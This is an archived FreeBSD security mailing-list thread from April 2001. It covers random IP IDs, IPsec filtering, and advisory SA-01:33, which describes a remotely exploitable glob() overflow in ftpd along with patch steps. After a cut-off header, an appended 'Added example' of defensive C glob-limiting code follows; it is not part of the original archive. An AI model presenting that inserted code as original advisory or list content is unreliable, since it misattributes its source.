Received: from bsdie.rwsystems.net([209.197.223.2]) (2117 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Tue, 17 Apr 2001 11:04:28 -0500 (CDT) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25)
Date: Tue, 17 Apr 2001 11:04:27 -0500 (CDT)
From: James Wyatt
To: Alfred Perlstein
Cc: Darren Reed , Julian Elischer , freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG
Subject: Re: non-random IP IDs
In-Reply-To: <20010417043130.F976@fw.wintelcom.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

On Tue, 17 Apr 2001, Alfred Perlstein wrote:

> * Darren Reed [010417 04:29] wrote:
> > In some mail from Julian Elischer, sie said:
> > >
> > > there is a site that calculates server uptime from these numbers.
> > > All the leading machines are freeBSD. When you do this it will
> > > no-longer be able to track us :-(
> >
> > IMHO, extraordinarily large uptimes are nothing to be proud of and
> > say nothing about the quality of software.
> >
> > I'd almost go so far as to say uptimes greater than 1 year indicate
> > that the system administration practices need review.
>
> Agreed. I've yet to hear about any seriously deployed system
> go without security advisories for over a year.

You don't have to reboot to fix all the security advisories - just a very
critical few... The last few haven't required reboots to either workaround
or fix. (Replacing libc on a running system *can* be tricky; I blew a SCO
box up that way once!)

Some machines with long uptimes are in fairly secure places (walled-in) so
they get serviced less - I've had an AIX box up 596 days, but it had *very*
specific use and "couldn't" take an outage. I also used a VAX that we
didn't find out could not boot until we tried. The boot params had been
goofed-up about six *months* before the failure and we didn't know it
until it nearly killed us...
- Jy@

From owner-freebsd-security Tue Apr 17 10:31:42 2001
Delivered-To: freebsd-security@freebsd.org
Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id 717FF37B43C; Tue, 17 Apr 2001 10:31:32 -0700 (PDT) (envelope-from dillon@earth.backplane.com)
Received: (from dillon@localhost) by earth.backplane.com (8.11.2/8.11.2) id f3HHVFu94944; Tue, 17 Apr 2001 10:31:15 -0700 (PDT) (envelope-from dillon)
Date: Tue, 17 Apr 2001 10:31:15 -0700 (PDT)
From: Matt Dillon
Message-Id: <200104171731.f3HHVFu94944@earth.backplane.com>
To: Kris Kennaway
Cc: Niels Provos , Kris Kennaway , Wes Peters , freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG, provos@OpenBSD.org
Subject: Re: non-random IP IDs
References: <20010416214611.6DA3F207C1@citi.umich.edu> <200104170157.f3H1v4d87804@earth.backplane.com> <20010416233042.A21394@xor.obsecurity.org>

:> It's not worth doing. We would be introducing unnecessary cpu burn on
:> every single packet we sent out, all to solve a problem that doesn't
:> really exist.
:
:Well, that's why it's a sysctl defaulting to off in my patch. Don't
:turn it on if you don't want to.
:
:Kris

    Let me put it another way: I think this sort of thing is an excellent
    example of introducing unnecessary kernel bloat into the system. Who
    gives a fart whether someone can port scan you efficiently or
    anonymously or not? I get port scanned every day. Most hackers don't
    even bother with portscans, they just try the exploit on the target
    machines directly.

                                        -Matt

From owner-freebsd-security Tue Apr 17 10:38:22 2001
Delivered-To: freebsd-security@freebsd.org
Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 2B59737B424; Tue, 17 Apr 2001 10:38:16 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net)
Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id KAA56704; Tue, 17 Apr 2001 10:37:56 -0700 (PDT) (envelope-from freebsd)
From: "Rodney W. Grimes"
Message-Id: <200104171737.KAA56704@gndrsh.dnsmgr.net>
Subject: Re: non-random IP IDs
In-Reply-To: <20010417043130.F976@fw.wintelcom.net> from Alfred Perlstein at "Apr 17, 2001 04:31:30 am"
To: bright@wintelcom.net (Alfred Perlstein)
Date: Tue, 17 Apr 2001 10:37:56 -0700 (PDT)
Cc: avalon@coombs.anu.edu.au (Darren Reed), julian@elischer.org (Julian Elischer), freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL54 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

> * Darren Reed [010417 04:29] wrote:
> > In some mail from Julian Elischer, sie said:
> > >
> > > there is a site that calculates server uptime from these numbers.
> > > All the leading machines are freeBSD. When you do this it will
> > > no-longer be able to track us :-(
> >
> > IMHO, extraordinarily large uptimes are nothing to be proud of and
> > say nothing about the quality of software.
> >
> > I'd almost go so far as to say uptimes greater than 1 year indicate
> > that the system administration practices need review.
>
> Agreed. I've yet to hear about any seriously deployed system
> go without security advisories for over a year.

Or perhaps this is a very talented system admin who values uptime and
finds workarounds that don't involve downing a system that do just as
good, and sometimes better, than the vendor fix for the security issue.

Security Fix != Reboot required.
--
Rod Grimes - KD7CAX @ CN85sl - (RWG25)               rgrimes@gndrsh.dnsmgr.net

From owner-freebsd-security Tue Apr 17 10:38:32 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.dyndns.org (adsl-63-207-60-27.dsl.lsan03.pacbell.net [63.207.60.27]) by hub.freebsd.org (Postfix) with ESMTP id EF51F37B43F; Tue, 17 Apr 2001 10:38:24 -0700 (PDT) (envelope-from kris@obsecurity.org)
Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 2A14F67C11; Tue, 17 Apr 2001 10:38:24 -0700 (PDT)
Date: Tue, 17 Apr 2001 10:38:23 -0700
From: Kris Kennaway
To: Matt Dillon
Cc: Kris Kennaway , Niels Provos , Wes Peters , freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG, provos@OpenBSD.org
Subject: Re: non-random IP IDs
Message-ID: <20010417103823.A49384@xor.obsecurity.org>
References: <20010416214611.6DA3F207C1@citi.umich.edu> <200104170157.f3H1v4d87804@earth.backplane.com> <20010416233042.A21394@xor.obsecurity.org> <200104171731.f3HHVFu94944@earth.backplane.com>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="7JfCtLOvnd9MIVvH"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200104171731.f3HHVFu94944@earth.backplane.com>; from dillon@earth.backplane.com on Tue, Apr 17, 2001 at 10:31:15AM -0700

On Tue, Apr 17, 2001 at 10:31:15AM -0700, Matt Dillon wrote:
>
> :> It's not worth doing. We would be introducing unnecessary cpu burn on
> :> every single packet we sent out, all to solve a problem that doesn't
> :> really exist.
> :
> :Well, that's why it's a sysctl defaulting to off in my patch. Don't
> :turn it on if you don't want to.
> :
> :Kris
>
> Let me put it another way: I think this sort of thing is an excellent
> example of introducing unnecessary kernel bloat into the system. Who
> gives a fart whether someone can port scan you efficiently or
> anonymously or not? I get port scanned every day. Most hackers don't
> even bother with portscans, they just try the exploit on the target
> machines directly.

Tools, not policy..

You may not care about it, but others do.
Kris

From owner-freebsd-security Tue Apr 17 10:41:41 2001
Delivered-To: freebsd-security@freebsd.org
Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id A8E1437B422; Tue, 17 Apr 2001 10:41:36 -0700 (PDT) (envelope-from dillon@earth.backplane.com)
Received: (from dillon@localhost) by earth.backplane.com (8.11.2/8.11.2) id f3HHfNZ95206; Tue, 17 Apr 2001 10:41:23 -0700 (PDT) (envelope-from dillon)
Date: Tue, 17 Apr 2001 10:41:23 -0700 (PDT)
From: Matt Dillon
Message-Id: <200104171741.f3HHfNZ95206@earth.backplane.com>
To: Kris Kennaway
Cc: Kris Kennaway , Niels Provos , Wes Peters , freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG, provos@OpenBSD.org
Subject: Re: non-random IP IDs
References: <20010416214611.6DA3F207C1@citi.umich.edu> <200104170157.f3H1v4d87804@earth.backplane.com> <20010416233042.A21394@xor.obsecurity.org> <200104171731.f3HHVFu94944@earth.backplane.com> <20010417103823.A49384@xor.obsecurity.org>

:> Let me put it another way: I think this sort of thing is an excellent
:> example of introducing unnecessary kernel bloat into the system. Who
:> gives a fart whether someone can port scan you efficiently or
:> anonymously or not? I get port scanned every day. Most hackers don't
:> even bother with portscans, they just try the exploit on the target
:> machines directly.
:
:Tools, not policy..
:
:You may not care about it, but others do.
:
:Kris

    If it isn't already a kernel option, please make it one. I don't
    want it compiled into the binary. Those people who 'care' can
    add it to their kernel config.

                                        -Matt

From owner-freebsd-security Tue Apr 17 10:47: 0 2001
Delivered-To: freebsd-security@freebsd.org
Received: from cithaeron.argolis.org (bgm-24-94-35-22.stny.rr.com [24.94.35.22]) by hub.freebsd.org (Postfix) with ESMTP id C9CD737B440; Tue, 17 Apr 2001 10:46:51 -0700 (PDT) (envelope-from piechota@argolis.org)
Received: from localhost (piechota@localhost) by cithaeron.argolis.org (8.11.3/8.11.3) with ESMTP id f3HHjQY46361; Tue, 17 Apr 2001 13:45:27 -0400 (EDT) (envelope-from piechota@argolis.org)
X-Authentication-Warning: cithaeron.argolis.org: piechota owned process doing -bs
Date: Tue, 17 Apr 2001 13:45:26 -0400 (EDT)
From: Matt Piechota
To: Kris Kennaway
Cc: Matt Dillon , Niels Provos , Wes Peters , , ,
Subject: Re: non-random IP IDs
In-Reply-To: <20010417103823.A49384@xor.obsecurity.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

On Tue, 17 Apr 2001, Kris Kennaway wrote:

> > :Well, that's why it's a sysctl defaulting to off in my patch. Don't
> > :turn it on if you don't want to.
> >
> > Let me put it another way: I think this sort of thing is an excellent
> > example of introducing unnecessary kernel bloat into the system. Who
> > gives a fart whether someone can port scan you efficiently or
> > anonymously or not? I get port scanned every day. Most hackers don't
> > even bother with portscans, they just try the exploit on the target
> > machines directly.
>
> Tools, not policy..
>
> You may not care about it, but others do.

Would it be better to do it as a kernel option?
options IP_RANDOM_IP_ID for instance? I guess the question is, does the
kernel have to do a comparison to the sysctl variable each time?

--
Matt Piechota
Finger piechota@emailempire.com for PGP key
AOL IM: cithaeron

From owner-freebsd-security Tue Apr 17 10:54:43 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.dyndns.org (adsl-63-207-60-27.dsl.lsan03.pacbell.net [63.207.60.27]) by hub.freebsd.org (Postfix) with ESMTP id 0499F37B423; Tue, 17 Apr 2001 10:54:37 -0700 (PDT) (envelope-from kris@obsecurity.org)
Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 50227675EE; Tue, 17 Apr 2001 10:54:25 -0700 (PDT)
Date: Tue, 17 Apr 2001 10:54:24 -0700
From: Kris Kennaway
To: Matt Dillon
Cc: freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG
Subject: Re: non-random IP IDs
Message-ID: <20010417105424.A63938@xor.obsecurity.org>
References: <20010416214611.6DA3F207C1@citi.umich.edu> <200104170157.f3H1v4d87804@earth.backplane.com> <20010416233042.A21394@xor.obsecurity.org> <200104171731.f3HHVFu94944@earth.backplane.com> <20010417103823.A49384@xor.obsecurity.org> <200104171741.f3HHfNZ95206@earth.backplane.com>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="WIyZ46R2i8wDzkSu"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200104171741.f3HHfNZ95206@earth.backplane.com>; from dillon@earth.backplane.com on Tue, Apr 17, 2001 at 10:41:23AM -0700

On Tue, Apr 17, 2001 at 10:41:23AM -0700, Matt Dillon wrote:
>
> :> Let me put it another way: I think this sort of thing is an excellent
> :> example of introducing unnecessary kernel bloat into the system. Who
> :> gives a fart whether someone can port scan you efficiently or
> :> anonymously or not? I get port scanned every day. Most hackers don't
> :> even bother with portscans, they just try the exploit on the target
> :> machines directly.
> :
> :Tools, not policy..
> :
> :You may not care about it, but others do.
> :
> :Kris
>
> If it isn't already a kernel option, please make it one. I don't
> want it compiled into the binary. Those people who 'care' can
> add it to their kernel config.

That's probably a reasonable compromise.
Kris

From owner-freebsd-security Tue Apr 17 10:55: 2 2001
Delivered-To: freebsd-security@freebsd.org
Received: from nsmail.corp.globalstar.com (gibraltar.globalstar.com [207.88.248.142]) by hub.freebsd.org (Postfix) with ESMTP id 225E637B43C; Tue, 17 Apr 2001 10:54:52 -0700 (PDT) (envelope-from crist.clark@globalstar.com)
Received: from globalstar.com ([207.88.153.184]) by nsmail.corp.globalstar.com (Netscape Messaging Server 4.15) with ESMTP id GBY72W00.NB6; Tue, 17 Apr 2001 10:54:32 -0700
Message-ID: <3ADC8368.C96550FE@globalstar.com>
Date: Tue, 17 Apr 2001 10:54:48 -0700
From: "Crist Clark"
Organization: Globalstar LP
X-Mailer: Mozilla 4.77 [en] (WinNT; U)
X-Accept-Language: en
MIME-Version: 1.0
To: Kris Kennaway
Cc: Matt Dillon , Niels Provos , Wes Peters , freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG, provos@OpenBSD.org
Subject: Re: non-random IP IDs
References: <20010416214611.6DA3F207C1@citi.umich.edu> <200104170157.f3H1v4d87804@earth.backplane.com> <20010416233042.A21394@xor.obsecurity.org> <200104171731.f3HHVFu94944@earth.backplane.com> <20010417103823.A49384@xor.obsecurity.org>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Kris Kennaway wrote:
>
> On Tue, Apr 17, 2001 at 10:31:15AM -0700, Matt Dillon wrote:
> >
> > :> It's not worth doing. We would be introducing unnecessary cpu burn on
> > :> every single packet we sent out, all to solve a problem that doesn't
> > :> really exist.
> > :
> > :Well, that's why it's a sysctl defaulting to off in my patch. Don't
> > :turn it on if you don't want to.
> > :
> > :Kris
> >
> > Let me put it another way: I think this sort of thing is an excellent
> > example of introducing unnecessary kernel bloat into the system. Who
> > gives a fart whether someone can port scan you efficiently or
> > anonymously or not? I get port scanned every day. Most hackers don't
> > even bother with portscans, they just try the exploit on the target
> > machines directly.
>
> Tools, not policy..
>
> You may not care about it, but others do.

Some people want it. The code already exists. Put it in the source tree
so those people who want it can have it, but more importantly, so we
never have to explain why OpenBSD has IP ID randomization and FreeBSD
does not or otherwise go through this same thread ever again.
I think the only bikesh^H^H^H^H^H^H question should be whether it is
(a) always built into the kernel, but has the sysctl switched off, or
(b) it requires a kernel config option like,

  options IP_ID_RANDOMIZE

(Which will not be in GENERIC) to get the code in the kernel.

Personally, I like (b). It's right there for those who want it, but the
bloat-watchers don't have to see that extra few bytes going to kernelland.

--
Crist J. Clark                           Network Security Engineer
crist.clark@globalstar.com               Globalstar, L.P.
(408) 933-4387                           FAX: (408) 933-4926

The information contained in this e-mail message is confidential,
intended only for the use of the individual or entity named above. If
the reader of this e-mail is not the intended recipient, or the employee
or agent responsible to deliver it to the intended recipient, you are
hereby notified that any review, dissemination, distribution or copying
of this communication is strictly prohibited. If you have received this
e-mail in error, please contact postmaster@globalstar.com

From owner-freebsd-security Tue Apr 17 11: 6:38 2001
Delivered-To: freebsd-security@freebsd.org
Received: from zeta.qmw.ac.uk (zeta.qmw.ac.uk [138.37.6.6]) by hub.freebsd.org (Postfix) with ESMTP id 0EBC637B42C; Tue, 17 Apr 2001 11:06:33 -0700 (PDT) (envelope-from d.m.pick@qmw.ac.uk)
Received: from xi.css.qmw.ac.uk ([138.37.8.11]) by zeta.qmw.ac.uk with esmtp (Exim 3.16 #1) id 14pZry-0005qP-00; Tue, 17 Apr 2001 19:06:30 +0100
Received: from cgaa180 by xi.css.qmw.ac.uk with local (Exim 1.92 #1) id 14pZry-0002mO-00; Tue, 17 Apr 2001 19:06:30 +0100
X-Mailer: exmh version 2.0.2 2/24/98
To: freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG, provos@OpenBSD.org
Subject: Re: non-random IP IDs
In-reply-to: Your message of "Tue, 17 Apr 2001 13:45:26 EDT."
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Tue, 17 Apr 2001 19:06:30 +0100
From: David Pick
Message-Id:

> Would it be better to do it as a kernel option?
> options IP_RANDOM_IP_ID for instance? I guess the question is, does the
> kernel have to do a comparison to the sysctl variable each time?

No. *IF* (big if!) something gets notified when a sysctl variable gets
changed (and I don't know if this is true) then it can test the variable
once and set a *function* variable to one of two functions: one simple
and fast, the other complicated and slow. No test needed for every
packet.

Of course, the overhead of a procedure call might (in the fast case) be
more than the overhead of an inline test. So perhaps write it as:

	if (function variable) {
		function_variable(parameter)
	} else {
		/* inline code */
	}

But there are *lots* of other tests per packet - is one more *that* bad?

--
David Pick

From owner-freebsd-security Tue Apr 17 11: 7:20 2001
Delivered-To: freebsd-security@freebsd.org
Received: from orthanc.ab.ca (orthanc.ab.ca [207.167.3.130]) by hub.freebsd.org (Postfix) with ESMTP id C6F0B37B632 for ; Tue, 17 Apr 2001 11:07:05 -0700 (PDT) (envelope-from lyndon@orthanc.ab.ca)
Received: from orthanc.ab.ca (localhost [127.0.0.1]) by orthanc.ab.ca (8.11.2/8.11.2) with ESMTP id f3HI74p23303 for ; Tue, 17 Apr 2001 12:07:04 -0600 (MDT) (envelope-from lyndon@orthanc.ab.ca)
Message-Id: <200104171807.f3HI74p23303@orthanc.ab.ca>
From: Lyndon Nerenberg
Organization: The Frobozz Magic Homing Pigeon Company
To: freebsd-security@FreeBSD.ORG
Subject: Re: Interaction between ipfw, IPSEC and natd
In-reply-to: Your message of "Tue, 17 Apr 2001 15:06:53 BST."
Date: Tue, 17 Apr 2001 12:07:04 -0600
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>>>>> "David" == David Pick writes:

    David> I think so - but I don't see why a daemon would be
    David> necessary. It seems to me that the sort of mechanism used
    David> by the "gif" interfaces would be appropriate. It *might*
    David> even be possible to extend the "gif" interface to do the
    David> job. The difference being that instead of encapsulating in
    David> an IP "tunnel" it would encapsulate in an IPSEC
    David> "tunnel".

You've pretty much described the OpenBSD enc(4) interface:

ENC(4)                   OpenBSD Programmer's Manual                    ENC(4)

NAME
     enc - Encapsulating Interface

SYNOPSIS
     pseudo-device enc 4

DESCRIPTION
     The enc interface is a software loopback mechanism that allows hosts or
     firewalls to filter ipsec(4) traffic using ipf(5).  The vpn(8) manpage
     shows an example of such a setup.

     The other use of the enc interface is to allow an administrator to see
     outgoing packets before they have been processed by ipsec(4), or
     incoming packets after they have been similarly processed, via
     tcpdump(8).

     The ``enc0'' interface inherits all IPsec traffic.  Thus all IPsec
     traffic can be filtered based on ``enc0'', and all IPsec traffic could
     be seen by invoking tcpdump(8) on the ``enc0'' interface.
--lyndon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 11:18:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 6971837B43E; Tue, 17 Apr 2001 11:17:58 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id OAA13455; Tue, 17 Apr 2001 14:12:40 -0400 (EDT) (envelope-from wollman) Date: Tue, 17 Apr 2001 14:12:40 -0400 (EDT) 
From: Garrett Wollman Message-Id: <200104171812.OAA13455@khavrinen.lcs.mit.edu> To: "Crist Clark" Cc: freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG Subject: Re: non-random IP IDs In-Reply-To: <3ADC8368.C96550FE@globalstar.com> References: <20010416214611.6DA3F207C1@citi.umich.edu> <200104170157.f3H1v4d87804@earth.backplane.com> <20010416233042.A21394@xor.obsecurity.org> <200104171731.f3HHVFu94944@earth.backplane.com> <20010417103823.A49384@xor.obsecurity.org> <3ADC8368.C96550FE@globalstar.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > Personally, I like (b). It's right there for those who want it, but > the bloat-watchers don't have to see that extra few bytes going to > kernelland. I think this is reasonable. With the way memory subsystems work these days, we need to avoid wasting valuable cache in order to get the maximum possible performance. -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 11:25:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from sasami.jurai.net (sasami.jurai.net [64.0.106.45]) by hub.freebsd.org (Postfix) with ESMTP id D4D0F37B422 for ; Tue, 17 Apr 2001 11:25:23 -0700 (PDT) (envelope-from scanner@jurai.net) Received: from localhost (scanner@localhost) by sasami.jurai.net (8.9.3/8.8.7) with ESMTP id OAA38269; Tue, 17 Apr 2001 14:25:21 -0400 (EDT) Date: Tue, 17 Apr 2001 14:25:21 -0400 (EDT) 
From:
To: Crist Clark
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: non-random IP IDs
In-Reply-To: <3ADC8368.C96550FE@globalstar.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

[CC trimmed because most don't need to see personal opinions...]

> Personally, I like (b). It's right there for those who want it, but
> the bloat-watchers don't have to see that extra few bytes going to
> kernelland.

I vote for (b) as well. As one person who sees too much crap in a base
install that a user has no control over, I prefer to have someone opt in
to bloating than force it on someone. As far as technical merit, which is
better I leave to the person(s) implementing the code.

Ahhh, I remember 2.1 days when my kernels were ~700K :)

=============================================================================
-Chris Watson  (316) 326-3862        | FreeBSD Consultant, FreeBSD Geek
Work: scanner@jurai.net              | Open Systems Inc., Wellington, Kansas
Home: scanner@deceptively.shady.org  | http://open-systems.net
=============================================================================
WINDOWS: "Where do you want to go today?"
LINUX: "Where do you want to go tomorrow?"
BSD: "Are you guys coming or what?"
=============================================================================
irc.openprojects.net #FreeBSD -Join the revolution!
ICQ: 20016186 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 12: 9:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A285D37B43C; Tue, 17 Apr 2001 12:09:42 -0700 (PDT) (envelope-from security-advisories@FreeBSD.org) Received: (from kris@localhost) by freefall.freebsd.org (8.11.1/8.11.1) id f3HJ9gH14235; Tue, 17 Apr 2001 12:09:42 -0700 (PDT) (envelope-from security-advisories@FreeBSD.org) Date: Tue, 17 Apr 2001 12:09:42 -0700 (PDT) Message-Id: <200104171909.f3HJ9gH14235@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f 
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Security Advisory FreeBSD-SA-01:33.ftpd-glob
Reply-To: security-advisories@FreeBSD.org
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-01:33                                           Security Advisory
                                                                FreeBSD, Inc.

Topic:          globbing vulnerability in ftpd

Category:       core
Module:         ftpd/libc
Announced:      2001-04-17
Credits:        John McDonald and Anthony Osborne, COVERT Labs
Affects:        FreeBSD 3.x (all releases), FreeBSD 4.x (all releases),
                FreeBSD 3.5-STABLE and 4.3-RC prior to the correction date.
Corrected:      2001-04-17 (FreeBSD 4.3-RC)
                2001-04-17 (FreeBSD 3.5-STABLE)
Vendor status:  Corrected
FreeBSD only:   NO

I.   Background

Numerous FTP daemons, including the daemon distributed with FreeBSD, use
server-side globbing to expand pathnames via user input.  This globbing is
performed by FreeBSD's glob() implementation in libc.

II.  Problem Description

The glob() function contains potential buffer overflows that may be
exploitable through the FTP daemon.  If a directory with a name of a
certain length is present, a remote user specifying a pathname using
globbing characters may cause arbitrary code to be executed on the FTP
server as the user running ftpd, usually root.

Additionally, when given a path containing numerous globbing characters,
the glob() functions may consume significant system resources when
expanding the path.  This can be controlled by setting user limits via
/etc/login.conf and setting limits on globbing expansion.

All versions of FreeBSD prior to the correction date, including FreeBSD
3.5.1 and 4.2, contain this problem.  The base system that will ship with
FreeBSD 4.3 does not contain this problem since it was corrected before
the release.

III. Impact

Remote users may be able to execute arbitrary code on the FTP server as
the user running ftpd, usually root.
The FTP daemon supplied with FreeBSD is enabled by default to allow access
to authorized local users and not anonymous users, thus limiting the
impact to authorized local users.

IV.  Workaround

If the FTP daemon is executed from inetd, disable the FTP daemon by
commenting out the ftp line in /etc/inetd.conf, then reload the inetd
configuration by executing the following command as root:

# killall -HUP inetd

V.   Solution

One of the following:

1) Upgrade to FreeBSD 4.3-RC or 3.5.1-STABLE after the correction date.

2) Download the patch and detached PGP signature from the following
location:

The following patch applies to FreeBSD 4.x:

# fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:33/glob.4.x.patch
# fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:33/glob.4.x.patch.asc

The following patch applies to FreeBSD 3.x:

# fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:33/glob.3.x.patch
# fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:33/glob.3.x.patch.asc

Verify the detached signature using your PGP utility.

Issue the following commands as root:

# cd /usr/src
# patch -p < /path/to/patch
# cd /usr/src/lib/libc
# make all install
# cd /usr/src/libexec/ftpd
# make all install

If the FTP daemon is running standalone, it will have to be manually
stopped and restarted.
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOtyT/VUuHi5z0oilAQGiIAP8CJ6Hsp52DuBQhQnA4xBl23kTCtCUKdPf zRP5yg5B9w+j+6Q6+k2P1B9lv5JcdvmS8+fzfrWUpUAogqkbL5f0njS7fnA68a5H oiGJgWqLQiMQiszeOOpgqvd1fNRCcCX+SgYewIfP93Cvam+GG+TvZQziV2zcne3O tjBG/FVzXkg= =P1j0 -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 12:40:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns1.via-net-works.net.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 15FB037B423 for ; Tue, 17 Apr 2001 12:40:38 -0700 (PDT) (envelope-from fpscha@ns1.via-net-works.net.ar) Received: (from fpscha@localhost) by ns1.via-net-works.net.ar (8.9.3/8.9.3) id QAA02034 for security@freebsd.org; Tue, 17 Apr 2001 16:42:57 -0300 (ART) 
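Added example for the SA-01:33 advisory above; it is not code from the advisory, from FreeBSD's libc or from ftpd. The advisory names two problems in server-side globbing: a buffer overflow in glob(), which only the libc patch fixes, and unbounded resource use when a pattern carries many globbing characters, which the advisory says can be controlled by limiting globbing expansion. This block shows what a daemon that hands user-supplied patterns to glob(3) can do on its own side of that second problem: refuse patterns with too many metacharacters before touching the filesystem, and cap the number of expanded pathnames it will hold. The names bounded_glob, bounded_glob_count, count_glob_meta, the BG_* codes and both thresholds are assumptions for the illustration; the GLOB_LIMIT and GLOB_MAXPATH flags that the FreeBSD patch introduces are BSD extensions and are deliberately not used, so this builds against any POSIX glob(3).

```c
#include <glob.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/*
 * Added example, not FreeBSD libc or ftpd code.  All names and the two
 * thresholds below are assumptions chosen for the illustration.
 */

#define BG_META_MAX   4u     /* assumed: most '*', '?', '[' allowed per pattern */
#define BG_PATHS_MAX  256u   /* assumed: most expanded pathnames we will hold   */

enum {
    BG_OK             =  0,   /* expanded; caller must globfree() */
    BG_NOMATCH        = -1,
    BG_TOO_MANY_META  = -2,   /* rejected before glob(3) is called */
    BG_TOO_MANY_PATHS = -3,   /* expansion larger than BG_PATHS_MAX */
    BG_ERROR          = -4    /* glob(3) failed (GLOB_NOSPACE, GLOB_ABORTED) */
};

/* Count the characters that make glob(3) walk directories. */
size_t count_glob_meta(const char *pattern)
{
    size_t n = 0;
    for (const char *p = pattern; *p != '\0'; p++)
        if (*p == '*' || *p == '?' || *p == '[')
            n++;
    return n;
}

/* Expand pattern into *g, enforcing both limits.  On BG_OK the caller
 * owns *g and must globfree() it; on any other return *g is released. */
int bounded_glob(const char *pattern, glob_t *g)
{
    if (count_glob_meta(pattern) > BG_META_MAX)
        return BG_TOO_MANY_META;            /* cheap check, no filesystem work */

    memset(g, 0, sizeof *g);
    int rc = glob(pattern, 0, NULL, g);
    if (rc == GLOB_NOMATCH) {
        globfree(g);
        return BG_NOMATCH;
    }
    if (rc != 0) {
        globfree(g);
        return BG_ERROR;
    }
    if (g->gl_pathc > BG_PATHS_MAX) {
        globfree(g);                        /* too big to serve; drop it all */
        return BG_TOO_MANY_PATHS;
    }
    return BG_OK;
}

/* For callers that only need the count: number of matches on success,
 * otherwise the negative BG_* code. */
int bounded_glob_count(const char *pattern)
{
    glob_t g;
    int rc = bounded_glob(pattern, &g);
    if (rc != BG_OK)
        return rc;
    int n = (int)g.gl_pathc;
    globfree(&g);
    return n;
}

int main(int argc, char **argv)
{
    /* Stand-in for the argument an FTP client would pass to NLST or LIST. */
    const char *pattern = argc > 1 ? argv[1] : "*/*/*/*/*/*";
    int n = bounded_glob_count(pattern);
    if (n < 0)
        printf("%s: rejected (%d)\n", pattern, n);
    else
        printf("%s: %d pathnames\n", pattern, n);
    return 0;
}
```

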